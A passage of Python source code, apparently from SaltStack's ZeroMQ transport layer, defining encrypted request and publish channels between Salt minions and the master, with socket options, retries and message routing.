Source: http://api.zeromq.org/4-1:zmq-tcp
'''
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip or source_port:
if source_ip and source_port:
return 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format(
source_ip=source_ip, source_port=source_port,
master_ip=master_ip, master_port=master_port)
elif source_ip and not source_port:
return 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format(
source_ip=source_ip,
master_ip=master_ip, master_port=master_port)
elif not source_ip and source_port:
return 'tcp://0.0.0.0:{source_port};{master_ip}:{master_port}'.format(
source_port=source_port,
master_ip=master_ip, master_port=master_port)
if source_ip or source_port:
log.warning('Unable to connect to the Master using a specific source IP / port')
log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6')
return 'tcp://{master_ip}:{master_port}'.format(
master_ip=master_ip, master_port=master_port)
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
install_zmq()
io_loop = ZMQDefaultLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncZeroMQReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = obj
log.trace('Inserted key into loop_instance_map id %s for key %s and process %s',
id(loop_instance_map), key, os.getpid())
else:
log.debug('Re-using AsyncZeroMQReqChannel for %s', key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop',):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClientPool(result.opts,
args=(result.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop}))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
install_zmq()
self._io_loop = ZMQDefaultLoop.current()
if self.crypt != 'clear':
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug('Connecting the Minion to the Master URI (for the return server): %s', self.opts['master_uri'])
self.message_client = AsyncReqMessageClientPool(self.opts,
args=(self.opts, self.opts['master_uri'],),
kwargs={'io_loop': self._io_loop})
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
if 'master_ip' in self.opts:
return _get_master_uri(self.opts['master_ip'],
self.opts['master_port'],
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_ret_port'))
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if 'key' not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
aes = key.private_decrypt(ret['key'],
RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw)
raise tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')
if self.opts.get('__role') == 'syndic':
self._socket.setsockopt(zmq.SUBSCRIBE, b'syndic')
else:
self._socket.setsockopt(
zmq.SUBSCRIBE,
salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b'')
self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id']))
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'])
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts['recon_default'] + self.opts['recon_max']
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
else:
self._stream.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return _get_master_uri(self.opts['master_ip'],
self.publish_port,
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_publish_port'))
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
if (self.opts.get('__role') != 'syndic' and messages[0] not in ('broadcast', self.hexid)) or \
(self.opts.get('__role') == 'syndic' and messages[0] not in ('broadcast', 'syndic')):
log.debug('Publish received for not this minion: %s', messages[0])
raise tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin,
salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
self.__setup_signals()
salt.utils.process.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
log.info('MWorkerQueue under PID %s is closing', os.getpid())
self._closing = True
# pylint: disable=E0203
if getattr(self, '_monitor', None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, '_w_monitor', None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, '_socket') and self._socket.closed is False:
self._socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
# pylint: enable=E0203
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
'''
Starts ZMQ monitor for debugging purposes.
:return:
'''
# Socket monitor shall be used the only for debug
# purposes so using threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
log.debug('Starting ZMQ monitor')
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
log.debug('ZMQ monitor has been started started')
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket %s', self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from underlying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc:
exc_type = type(exc).__name__
if exc_type == 'AuthenticationError':
log.debug(
'Minion failed to auth to master. Since the payload is '
'encrypted, it is not known which minion failed to '
'authenticate. It is likely that this is a transient '
'failure due to the master rotating its public key.'
)
else:
log.error('Bad load from minion: %s: %s', exc_type, exc)
stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: %s and load was %s', payload, payload.get('load'))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
'''
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
it's host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and opts:
if 'tcp_keepalive' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE, opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl']
)
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on %s', pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.trace('Getting data from puller %s', pull_uri)
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package)
payload = unpacked_package['payload']
log.trace('Accepted unpacked package from puller')
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
log.trace('Sending filtered data over publisher %s', pub_uri)
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(hashlib.sha1(topic).hexdigest())
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent')
# Syndic broadcast
if self.opts.get('order_masters'):
log.trace('Sending filtered data to syndic')
pub_sock.send(b'syndic', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent to syndic')
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
log.trace('Sending broadcasted data over publisher %s', pub_uri)
pub_sock.send(b'broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Broadcasted data has been sent')
else:
log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri)
pub_sock.send(payload)
log.trace('Unfiltered data has been sent')
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload['topic_lst'] = match_ids
pub_sock.send(self.serial.dumps(int_payload))
pub_sock.close()
context.term()
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
def __del__(self):
self.destroy()
def destroy(self):
for message_client in self.message_clients:
message_client.destroy()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underlying zeromq REQ socket and gives a future-based
interface to sending and recieving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
install_zmq()
ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug('Trying to connect to: %s', self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timedout
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=W0702
log.debug('Re-init ZMQ socket: %s', err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't been already timedout
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. (%s/%s)', future.attempts, future.tries)
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
